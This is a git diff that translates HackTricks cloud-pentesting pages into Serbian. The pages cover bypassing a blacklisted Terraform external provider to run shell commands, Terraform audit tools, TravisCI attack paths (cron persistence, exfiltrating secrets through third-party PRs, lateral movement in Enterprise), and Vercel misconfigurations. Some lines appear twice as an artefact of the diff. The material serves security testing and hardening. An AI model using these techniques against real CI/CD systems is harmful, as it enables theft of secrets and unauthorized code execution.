U slučaju da naiđete na situaciju gde je `hashicorp/external` stavljen na crnu listu, možete ponovo implementirati `external` provajder na sledeći način. Napomena: Koristimo fork external provajdera objavljen od strane https://registry.terraform.io/providers/nazarewk/external/latest. Možete objaviti svoj vlastiti fork ili ponovnu implementaciju.
```terraform
terraform {
required_providers {
external = {
source = "nazarewk/external"
version = "3.0.0"
}
}
required_providers {
external = {
source = "nazarewk/external"
version = "3.0.0"
}
}
}
```
Then you can use `external` as per normal.
Zatim možete koristiti `external` kao i obično.
```terraform
data "external" "example" {
program = ["sh", "-c", "whoami"]
program = ["sh", "-c", "whoami"]
}
```
## Automatic Audit Tools
### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
Snyk offers a comprehensive Infrastructure as Code (IaC) scanning solution that detects vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats.
Snyk nudi sveobuhvatno rešenje za skeniranje Infrastructure as Code (IaC) koje otkriva ranjivosti i pogrešne konfiguracije u Terraform, CloudFormation, Kubernetes i drugim IaC formatima.
- **Features:**
- Real-time scanning for security vulnerabilities and compliance issues.
- Integration with version control systems (GitHub, GitLab, Bitbucket).
- Automated fix pull requests.
- Detailed remediation advice.
- **Sign Up:** Create an account on [Snyk](https://snyk.io/).
- Skeniranje u realnom vremenu za sigurnosne ranjivosti i probleme usklađenosti.
- Integracija sa sistemima za kontrolu verzija (GitHub, GitLab, Bitbucket).
- Automatizovani zahtevi za ispravke.
- Detaljna uputstva za otklanjanje problema.
- **Sign Up:** Kreirajte nalog na [Snyk](https://snyk.io/).
```bash
brew tap snyk/tap
brew install snyk
snyk auth
snyk iac test /path/to/terraform/code
```
### [Checkov](https://github.com/bridgecrewio/checkov) <a href="#install-checkov-from-pypi" id="install-checkov-from-pypi"></a>
**Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages.
**Checkov** je alat za statičku analizu koda za infrastrukturu kao kod (IaC) i takođe alat za analizu sastava softvera (SCA) za slike i open source pakete.
It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), or [OpenTofu](https://opentofu.org/) and detects security and compliance misconfigurations using graph-based scanning.
It performs [Software Composition Analysis (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs).
Skenira cloud infrastrukturu obezbeđenu pomoću [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), ili [OpenTofu](https://opentofu.org/) i otkriva bezbednosne i usklađenosti greške u konfiguraciji koristeći skeniranje zasnovano na grafu.
Izvodi [analizu sastava softvera (SCA) skeniranje](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) koja je skeniranje open source paketa i slika za zajedničke ranjivosti i izloženosti (CVE).
```bash
pip install checkov
checkov -d /path/to/folder
```
### [terraform-compliance](https://github.com/terraform-compliance/cli)
From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code.
From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` je lagan, bezbednosno i usklađenosti fokusiran test okvir protiv terraform-a koji omogućava negativne testne sposobnosti za vašu infrastrukturu kao kod.
- **compliance:** Ensure the implemented code is following security standards, your own custom standards
- **behaviour driven development:** We have BDD for nearly everything, why not for IaC ?
- **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/)
- **pre-deploy:** it validates your code before it is deployed
- **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated.
- **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible.
- **usaglašenost:** Osigurajte da implementirani kod prati bezbednosne standarde, vaše sopstvene prilagođene standarde
- **razvoj vođen ponašanjem:** Imamo BDD za gotovo sve, zašto ne i za IaC?
- **prenosiv:** samo ga instalirajte iz `pip` ili ga pokrenite putem `docker`. Pogledajte [Instalacija](https://terraform-compliance.com/pages/installation/)
- **pre-deploy:** validira vaš kod pre nego što bude implementiran
- **lako za integraciju:** može se pokrenuti u vašem pipeline-u (ili u git hooks) kako bi se osiguralo da su sve implementacije validirane.
- **razdvajanje dužnosti:** možete čuvati svoje testove u drugom repozitorijumu gde je odgovorna posebna ekipa.
> [!NOTE]
> Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool.
> Nažalost, ako kod koristi neke provajdere kojima nemate pristup, nećete moći da izvršite `terraform plan` i pokrenete ovaj alat.
```bash
pip install terraform-compliance
terraform plan -out=plan.out
terraform-compliance -f /path/to/folder
```
### [tfsec](https://github.com/aquasecurity/tfsec)
From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations.
- ☁️ Checks for misconfigurations across all major (and some minor) cloud providers
- ⛔ Hundreds of built-in rules
- 🪆 Scans modules (local and remote)
- Evaluates HCL expressions as well as literal values
- ↪️ Evaluates Terraform functions e.g. `concat()`
- 🔗 Evaluates relationships between Terraform resources
- 🧰 Compatible with the Terraform CDK
- 🙅 Applies (and embellishes) user-defined Rego policies
- 📃 Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif.
- 🛠️ Configurable (via CLI flags and/or config file)
- ⚡ Very fast, capable of quickly scanning huge repositories
From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec koristi statičku analizu vašeg terraform koda da bi uočio potencijalne pogrešne konfiguracije.
- ☁️ Proverava pogrešne konfiguracije kod svih glavnih (i nekih manjih) provajdera u oblaku
- ⛔ Stotine ugrađenih pravila
- 🪆 Skenira module (lokalne i udaljene)
- Evaluira HCL izraze kao i literalne vrednosti
- ↪️ Evaluira Terraform funkcije npr. `concat()`
- 🔗 Evaluira odnose između Terraform resursa
- 🧰 Kompatibilan sa Terraform CDK
- 🙅 Primena (i obogaćivanje) korisnički definisanih Rego politika
- 📃 Podržava više formata izlaza: lepi (podrazumevani), JSON, SARIF, CSV, CheckStyle, JUnit, tekst, Gif.
- 🛠️ Konfigurisanje (putem CLI zastavica i/ili konfiguracione datoteke)
- ⚡ Veoma brzo, sposobno da brzo skenira ogromne repozitorijume
```bash
brew install tfsec
tfsec /path/to/folder
```
### [KICKS](https://github.com/Checkmarx/kics)
Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle of your infrastructure-as-code with **KICS** by Checkmarx.
**KICS** stands for **K**eeping **I**nfrastructure as **C**ode **S**ecure, it is open source and is a must-have for any cloud native project.
Pronađite sigurnosne ranjivosti, probleme usklađenosti i greške u konfiguraciji infrastrukture rano u razvoju vaše infrastrukture kao koda uz **KICS** od Checkmarx-a.
**KICS** označava **K**eeping **I**nfrastructure as **C**ode **S**ecure, otvorenog je koda i neophodan je za svaki projekat zasnovan na oblaku.
```bash
docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/"
```
### [Terrascan](https://github.com/tenable/terrascan)
From the [**docs**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to:
- Seamlessly scan infrastructure as code for misconfigurations.
- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture.
- Detect security vulnerabilities and compliance violations.
- Mitigate risks before provisioning cloud native infrastructure.
- Offers flexibility to run locally or integrate with your CI\CD.
Iz [**dokumentacije**](https://github.com/tenable/terrascan): Terrascan je statički analizator koda za infrastrukturu kao kod. Terrascan vam omogućava da:
- Besprekorno skenirate infrastrukturu kao kod za pogrešne konfiguracije.
- Pratite obezbeđenu cloud infrastrukturu za promene konfiguracije koje uvode promene u bezbednosti, i omogućava vraćanje na sigurnu poziciju.
- Otkrivate bezbednosne ranjivosti i kršenja usklađenosti.
- Ublažavate rizike pre nego što obezbedite cloud native infrastrukturu.
- Nudi fleksibilnost za lokalno pokretanje ili integraciju sa vašim CI\CD.
```bash
brew install terrascan
```
## References
## Reference
- [Atlantis Security](atlantis-security.md)
- [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce)
@@ -310,7 +280,3 @@ brew install terrascan
- [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/)
{{#include ../banners/hacktricks-training.md}}

8
src/pentesting-ci-cd/todo.md
View File

@@ -2,7 +2,7 @@
{{#include ../banners/hacktricks-training.md}}
Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective
Github PRs su dobrodošli koji objašnjavaju kako (zlo)upotrebljavati te platforme iz perspektive napadača
- Drone
- TeamCity
@@ -11,10 +11,6 @@ Github PRs are welcome explaining how to (ab)use those platforms from an attacke
- Rancher
- Mesosphere
- Radicle
- Any other CI/CD platform...
- Bilo koja druga CI/CD platforma...
{{#include ../banners/hacktricks-training.md}}

50
src/pentesting-ci-cd/travisci-security/README.md
View File

@@ -2,68 +2,64 @@
{{#include ../../banners/hacktricks-training.md}}
## What is TravisCI
## Šta je TravisCI
**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**.
**Travis CI** je **hostovana** ili na **mestu** **usluga kontinuirane integracije** koja se koristi za izgradnju i testiranje softverskih projekata hostovanih na nekoliko **različitih git platformi**.
{{#ref}}
basic-travisci-information.md
{{#endref}}
## Attacks
## Napadi
### Triggers
### Okidači
To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**:
Da biste pokrenuli napad, prvo morate znati kako da pokrenete izgradnju. Po defaultu, TravisCI će **pokrenuti izgradnju na push-evima i pull zahtevima**:
![](<../../images/image (145).png>)
#### Cron Jobs
#### Cron poslovi
If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build:
Ako imate pristup web aplikaciji, možete **postaviti cron-ove za pokretanje izgradnje**, što može biti korisno za postizanje postojanosti ili za pokretanje izgradnje:
![](<../../images/image (243).png>)
> [!NOTE]
> It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162).
> Izgleda da nije moguće postaviti cron-ove unutar `.travis.yml` prema [ovome](https://github.com/travis-ci/travis-ci/issues/9162).
### Third Party PR
### PR-ovi trećih strana
TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets:
TravisCI po defaultu onemogućava deljenje env varijabli sa PR-ovima koji dolaze od trećih strana, ali neko može to omogućiti i tada možete kreirati PR-ove za repozitorij i eksfiltrirati tajne:
![](<../../images/image (208).png>)
### Dumping Secrets
### Ispumpavanje tajni
As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines).
Kao što je objašnjeno na stranici [**osnovne informacije**](basic-travisci-information.md), postoje 2 tipa tajni. **Tajne varijable okruženja** (koje su navedene na web stranici) i **prilagođene enkriptovane tajne**, koje su pohranjene unutar `.travis.yml` datoteke kao base64 (napomena da će obe, kada su pohranjene enkriptovane, završiti kao varijable okruženja na konačnim mašinama).
- To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build.
- To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**.
- To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as:
- Da biste **enumerisali tajne** konfigurirane kao **varijable okruženja**, idite na **postavke** **projekta** i proverite listu. Međutim, imajte na umu da će sve varijable okruženja projekta postavljene ovde pojaviti kada pokrenete izgradnju.
- Da biste enumerisali **prilagođene enkriptovane tajne**, najbolje što možete učiniti je da **proverite `.travis.yml` datoteku**.
- Da biste **enumerisali enkriptovane datoteke**, možete proveriti za **`.enc` datoteke** u repozitorijumu, za linije slične `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` u konfiguracionoj datoteci, ili za **enkriptovane iv i ključeve** u **varijablama okruženja** kao što su:
![](<../../images/image (81).png>)
### TODO:
- Example build with reverse shell running on Windows/Mac/Linux
- Example build leaking the env base64 encoded in the logs
- Primer izgradnje sa reverznim shell-om koji radi na Windows/Mac/Linux
- Primer izgradnje koja otkriva env base64 kodirane u logovima
### TravisCI Enterprise
If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to:
Ako napadač završi u okruženju koje koristi **TravisCI enterprise** (više informacija o tome šta je to u [**osnovnim informacijama**](basic-travisci-information.md#travisci-enterprise)), moći će da **pokrene izgradnje u Worker-u.** To znači da će napadač moći da se lateralno pomera ka tom serveru sa kojeg bi mogao da:
- escape to the host?
- compromise kubernetes?
- compromise other machines running in the same network?
- compromise new cloud credentials?
- pobegne na host?
- kompromituje kubernetes?
- kompromituje druge mašine koje rade u istoj mreži?
- kompromituje nove cloud kredencijale?
## References
## Reference
- [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/)
- [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security)
{{#include ../../banners/hacktricks-training.md}}

72
src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
View File

@@ -1,48 +1,45 @@
# Basic TravisCI Information
# Osnovne informacije o TravisCI
{{#include ../../banners/hacktricks-training.md}}
## Access
## Pristup
TravisCI directly integrates with different git platforms such as Github, Bitbucket, Assembla, and Gitlab. It will ask the user to give TravisCI permissions to access the repos he wants to integrate with TravisCI.
TravisCI se direktno integriše sa različitim git platformama kao što su Github, Bitbucket, Assembla i Gitlab. Pitaće korisnika da da TravisCI dozvole za pristup repozitorijumima koje želi da integriše sa TravisCI.
For example, in Github it will ask for the following permissions:
Na primer, u Github-u će tražiti sledeće dozvole:
- `user:email` (read-only)
- `read:org` (read-only)
- `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations.
- `user:email` (samo za čitanje)
- `read:org` (samo za čitanje)
- `repo`: Daje pristup za čitanje i pisanje koda, statusa commit-a, saradnika i statusa implementacije za javne i privatne repozitorijume i organizacije.
## Encrypted Secrets
## Enkriptovane Tajne
### Environment Variables
### Promenljive Okruženja
In TravisCI, as in other CI platforms, it's possible to **save at repo level secrets** that will be saved encrypted and be **decrypted and push in the environment variable** of the machine executing the build.
U TravisCI, kao i na drugim CI platformama, moguće je **sačuvati na nivou repozitorijuma tajne** koje će biti sačuvane enkriptovane i biće **dekriptovane i postavljene u promenljivu okruženja** mašine koja izvršava gradnju.
![](<../../images/image (203).png>)
It's possible to indicate the **branches to which the secrets are going to be available** (by default all) and also if TravisCI **should hide its value** if it appears **in the logs** (by default it will).
Moguće je naznačiti **grane na kojima će tajne biti dostupne** (podrazumevano sve) i takođe da li TravisCI **treba da sakrije njenu vrednost** ako se pojavi **u logovima** (podrazumevano hoće).
### Custom Encrypted Secrets
### Prilagođene Enkriptovane Tajne
For **each repo** TravisCI generates an **RSA keypair**, **keeps** the **private** one, and makes the repositorys **public key available** to those who have **access** to the repository.
You can access the public key of one repo with:
Za **svaki repozitorijum** TravisCI generiše **RSA ključni par**, **čuva** **privatni** ključ, i čini **javnim ključem repozitorijuma dostupnim** onima koji imaju **pristup** repozitorijumu.
Možete pristupiti javnom ključu jednog repozitorijuma sa:
```
travis pubkey -r <owner>/<repo_name>
travis pubkey -r carlospolop/t-ci-test
```
Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**.
Zatim, možete koristiti ovu postavku da **enkriptujete tajne i dodate ih u vaš `.travis.yaml`**. Tajne će biti **dekriptovane kada se izgradnja pokrene** i dostupne u **promenljivim okruženja**.
![](<../../images/image (139).png>)
Note that the secrets encrypted this way won't appear listed in the environmental variables of the settings.
Imajte na umu da tajne enkriptovane na ovaj način neće biti navedene u promenljivim okruženja podešavanja.
### Custom Encrypted Files
Same way as before, TravisCI also allows to **encrypt files and then decrypt them during the build**:
### Prilagođene Enkriptovane Datoteke
Na isti način kao i pre, TravisCI takođe omogućava da **enkriptujete datoteke i zatim ih dekriptujete tokom izgradnje**:
```
travis encrypt-file super_secret.txt -r carlospolop/t-ci-test
@@ -52,7 +49,7 @@ storing secure env variables for decryption
Please add the following to your build script (before_install stage in your .travis.yml, for instance):
openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
Pro Tip: You can add it automatically by running with --add.
@@ -60,37 +57,32 @@ Make sure to add super_secret.txt.enc to the git repository.
Make sure not to add super_secret.txt to the git repository.
Commit all changes to your .travis.yml.
```
Note that when encrypting a file 2 Env Variables will be configured inside the repo such as:
Napomena da će prilikom enkripcije datoteke 2 Env Varijable biti konfigurisane unutar repozitorijuma kao što su:
![](<../../images/image (170).png>)
## TravisCI Enterprise
Travis CI Enterprise is an **on-prem version of Travis CI**, which you can deploy **in your infrastructure**. Think of the server version of Travis CI. Using Travis CI allows you to enable an easy-to-use Continuous Integration/Continuous Deployment (CI/CD) system in an environment, which you can configure and secure as you want to.
Travis CI Enterprise je **on-prem verzija Travis CI**, koju možete implementirati **u svojoj infrastrukturi**. Zamislite server verziju Travis CI. Korišćenje Travis CI omogućava vam da omogućite jednostavan sistem Kontinuirane Integracije/Kontinuirane Isporuke (CI/CD) u okruženju koje možete konfigurisati i obezbediti kako želite.
**Travis CI Enterprise consists of two major parts:**
**Travis CI Enterprise se sastoji od dva glavna dela:**
1. TCI **services** (or TCI Core Services), responsible for integration with version control systems, authorizing builds, scheduling build jobs, etc.
2. TCI **Worker** and build environment images (also called OS images).
1. TCI **usluge** (ili TCI Core Services), odgovorne za integraciju sa sistemima za kontrolu verzija, autorizaciju gradnji, zakazivanje poslova gradnje, itd.
2. TCI **Worker** i slike okruženja za gradnju (takođe nazvane OS slike).
**TCI Core services require the following:**
**TCI Core usluge zahtevaju sledeće:**
1. A **PostgreSQL11** (or later) database.
2. An infrastructure to deploy a Kubernetes cluster; it can be deployed in a server cluster or in a single machine if required
3. Depending on your setup, you may want to deploy and configure some of the components on your own, e.g., RabbitMQ - see the [Setting up Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) for more details.
1. **PostgreSQL11** (ili noviji) bazu podataka.
2. Infrastrukturu za implementaciju Kubernetes klastera; može se implementirati u klasteru servera ili na jednoj mašini ako je potrebno.
3. U zavisnosti od vaše konfiguracije, možda ćete želeti da implementirate i konfigurišete neke od komponenti sami, npr., RabbitMQ - pogledajte [Postavljanje Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) za više detalja.
**TCI Worker requires the following:**
**TCI Worker zahteva sledeće:**
1. An infrastructure where a docker image containing the **Worker and a linked build image can be deployed**.
2. Connectivity to certain Travis CI Core Services components - see the [Setting Up Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) for more details.
1. Infrastrukturu gde se može implementirati docker slika koja sadrži **Worker i povezanu sliku za gradnju**.
2. Povezivost sa određenim komponentama Travis CI Core Services - pogledajte [Postavljanje Workera](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) za više detalja.
The amount of deployed TCI Worker and build environment OS images will determine the total concurrent capacity of Travis CI Enterprise deployment in your infrastructure.
Količina implementiranih TCI Worker i slika okruženja za gradnju OS će odrediti ukupni kapacitet istovremenih operacija Travis CI Enterprise implementacije u vašoj infrastrukturi.
![](<../../images/image (199).png>)
{{#include ../../banners/hacktricks-training.md}}

532
src/pentesting-ci-cd/vercel-security.md
View File

@@ -2,440 +2,436 @@
{{#include ../banners/hacktricks-training.md}}
## Basic Information
## Osnovne informacije
In Vercel a **Team** is the complete **environment** that belongs a client and a **project** is an **application**.
U Vercelu, **Tim** je kompletno **okruženje** koje pripada klijentu, a **projekat** je **aplikacija**.
For a hardening review of **Vercel** you need to ask for a user with **Viewer role permission** or at least **Project viewer permission over the projects** to check (in case you only need to check the projects and not the Team configuration also).
Za pregled učvršćivanja **Vercela**, potrebno je zatražiti korisnika sa **dozvolom za gledanje** ili barem **dozvolom za gledanje projekta** kako bi se proverili projekti (u slučaju da je potrebno proveriti samo projekte, a ne i konfiguraciju tima).
## Project Settings
## Podešavanja projekta
### General
### Opšte
**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations.
**Svrha:** Upravljanje osnovnim podešavanjima projekta kao što su naziv projekta, okvir i konfiguracije izgradnje.
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **Transfer**
- **Misconfiguration:** Allows to transfer the project to another team
- **Risk:** An attacker could steal the project
- **Delete Project**
- **Misconfiguration:** Allows to delete the project&#x20;
- **Risk:** Delete the prject
- **Prenos**
- **Pogrešna konfiguracija:** Omogućava prenos projekta na drugi tim
- **Rizik:** Napadač bi mogao ukrasti projekat
- **Brisanje projekta**
- **Pogrešna konfiguracija:** Omogućava brisanje projekta&#x20;
- **Rizik:** Brisanje projekta
---
### Domains
### Domeni
**Purpose:** Manage custom domains, DNS settings, and SSL configurations.
**Svrha:** Upravljanje prilagođenim domenima, DNS podešavanjima i SSL konfiguracijama.
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **DNS Configuration Errors**
- **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers.
- **Risk:** Domain hijacking, traffic interception, and phishing attacks.
- **SSL/TLS Certificate Management**
- **Misconfiguration:** Using weak or expired SSL/TLS certificates.
- **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality.
- **DNSSEC Implementation**
- **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings.
- **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks.
- **Environment used per domain**
- **Misconfiguration:** Change the environment used by the domain in production.
- **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production.
- **Greške u DNS konfiguraciji**
- **Pogrešna konfiguracija:** Neispravni DNS zapisi (A, CNAME) koji upućuju na zlonamerne servere.
- **Rizik:** Otmica domena, presretanje saobraćaja i phishing napadi.
- **Upravljanje SSL/TLS sertifikatima**
- **Pogrešna konfiguracija:** Korišćenje slabih ili istečenih SSL/TLS sertifikata.
- **Rizik:** Ranljivost na napade tipa man-in-the-middle (MITM), kompromitovanje integriteta i poverljivosti podataka.
- **Implementacija DNSSEC**
- **Pogrešna konfiguracija:** Neaktiviranje DNSSEC ili pogrešna DNSSEC podešavanja.
- **Rizik:** Povećana podložnost napadima lažiranja DNS-a i trovanja kešom.
- **Okruženje korišćeno po domenu**
- **Pogrešna konfiguracija:** Promena okruženja koje koristi domen u produkciji.
- **Rizik:** Izlaganje potencijalnih tajni ili funkcionalnosti koje ne bi trebale biti dostupne u produkciji.
---
### Environments
### Okruženja
**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables.
**Svrha:** Definisanje različitih okruženja (Razvoj, Pregled, Proizvodnja) sa specifičnim podešavanjima i varijablama.
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **Environment Isolation**
- **Misconfiguration:** Sharing environment variables across environments.
- **Risk:** Leakage of production secrets into development or preview environments, increasing exposure.
- **Access to Sensitive Environments**
- **Misconfiguration:** Allowing broad access to production environments.
- **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches.
- **Izolacija okruženja**
- **Pogrešna konfiguracija:** Deljenje varijabli okruženja između okruženja.
- **Rizik:** Curjenje produkcijskih tajni u razvojna ili pregledna okruženja, povećavajući izloženost.
- **Pristup osetljivim okruženjima**
- **Pogrešna konfiguracija:** Omogućavanje širokog pristupa produkcijskim okruženjima.
- **Rizik:** Neovlašćene promene ili pristup aktivnim aplikacijama, što može dovesti do potencijalnih prekida rada ili curenja podataka.
---
### Environment Variables
### Varijable okruženja
**Purpose:** Manage environment-specific variables and secrets used by the application.
**Svrha:** Upravljanje varijablama i tajnama specifičnim za okruženje koje koristi aplikacija.
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **Exposing Sensitive Variables**
- **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
- **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
- **Sensitive disabled**
- **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
- **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
- **Shared Environment Variables**
- **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information.
- **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
- **Izlaganje osetljivih varijabli**
- **Pogrešna konfiguracija:** Prefiksiranje osetljivih varijabli sa `NEXT_PUBLIC_`, čineći ih dostupnim na klijentskoj strani.
- **Rizik:** Izlaganje API ključeva, kredencijala baze podataka ili drugih osetljivih podataka javnosti, što dovodi do curenja podataka.
- **Osetljivo onemogućeno**
- **Pogrešna konfiguracija:** Ako je onemogućeno (podrazumevano) moguće je pročitati vrednosti generisanih tajni.
- **Rizik:** Povećana verovatnoća slučajnog izlaganja ili neovlašćenog pristupa osetljivim informacijama.
- **Deljene varijable okruženja**
- **Pogrešna konfiguracija:** Ovo su varijable okruženja postavljene na nivou tima i mogu takođe sadržati osetljive informacije.
- **Rizik:** Povećana verovatnoća slučajnog izlaganja ili neovlašćenog pristupa osetljivim informacijama.
---
### Git
**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers.
**Svrha:** Konfigurišite integracije Git repozitorijuma, zaštitu grana i okidače za implementaciju.
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **Ignored Build Step (TODO)**
- **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE.
- **Risk:** TBD
- **Ignorisani korak izgradnje (TODO)**
- **Pogrešna konfiguracija:** Čini se da ova opcija omogućava konfiguraciju bash skripte/komandi koje će se izvršiti kada se novi commit pošalje na Github, što bi moglo omogućiti RCE.
- **Rizik:** TBD
---
### Integrations
### Integracije
**Purpose:** Connect third-party services and tools to enhance project functionalities.
**Svrha:** Povezivanje usluga i alata trećih strana za poboljšanje funkcionalnosti projekta.
#### Security Configurations:
#### Konfiguracije bezbednosti:
- **Insecure Third-Party Integrations**
- **Misconfiguration:** Integrating with untrusted or insecure third-party services.
- **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations.
- **Over-Permissioned Integrations**
- **Misconfiguration:** Granting excessive permissions to integrated services.
- **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions.
- **Lack of Integration Monitoring**
- **Misconfiguration:** Failing to monitor and audit third-party integrations.
- **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches.
- **Neosigurane integracije trećih strana**
